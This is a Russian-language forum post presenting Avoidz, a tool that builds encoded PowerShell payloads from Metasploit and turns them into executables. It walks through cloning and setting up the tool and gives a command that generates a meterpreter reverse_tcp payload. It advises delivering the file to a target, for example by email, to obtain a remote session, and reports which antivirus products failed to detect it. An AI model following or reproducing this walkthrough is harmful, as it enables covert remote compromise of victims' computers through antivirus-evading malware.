Avoidz-инструмент для автогенерации полезной нагрузки
Привет Друзья и те,кому небезразлична ИБ.
Напоминаю гостям,что администрация ресурса и автор обзора , не призывают использовать рассматриваемые инструменты в незаконных целях.Вся информация исключительно для ознакомления.
Сегодня буду вас знакомить с интересной и свежей версией байпаса.
Помогать мне в этом будет Kali Linux.
Инструмент работает с Metasploit ,автоматически генерирует в закодированном виде powershell, опираясь на полезные нагрузки,которыми богат Metasploit.
На выходе мы получаем готовый, конвертируемый в исполняемый файл объект,который надо доставить на тестируемый хост.
Зависимости,которые требуются:
1 - metasploit-framework
2 - xterm
3 - MinGW32
4 - Monodevelop
Как скачать : git clone https://github.com/M4sc3r4n0/avoidz.git
Затем необходимо зайти в директорию инструмента
# cd avoidz/
Сделать файл setup.sh исполняемым : # chmod +x setup.sh
Запустить этот скрипт,он проверит наличие зависимостей: # . /setup.sh
Далее , можно познакомиться с опциями: #. /avoidz.rb
Формат команды для подготовки и генерирования полезной нагрузки :
# ./avoidz.rb -h ip адрес цели -p номер порта,на котор.прилетит сессия -m windows/meterpreter/reverse_tcp -f temp1
Файл доставляем каким угодно способом на целевой хост (я тестировал на своих ресурсах через получение письма). Терминал не закрываем,соглашаемся с предложением и ждём..в случае удачи получаем сессию.
Ссылка на видео от автора.
Подробно не тестировал этот метод,при выборочной проверке Nodе32 и "Касперский" полной версии тревогу не объявляли.
А вот при запуске,правда,последний иногда перехватывал процесс и определял в карантин экзешник как неизвестный тип вредоноса.
Возможно ,кому-то будет интересно. А у меня на этом пока всё. Благодарю за внимание.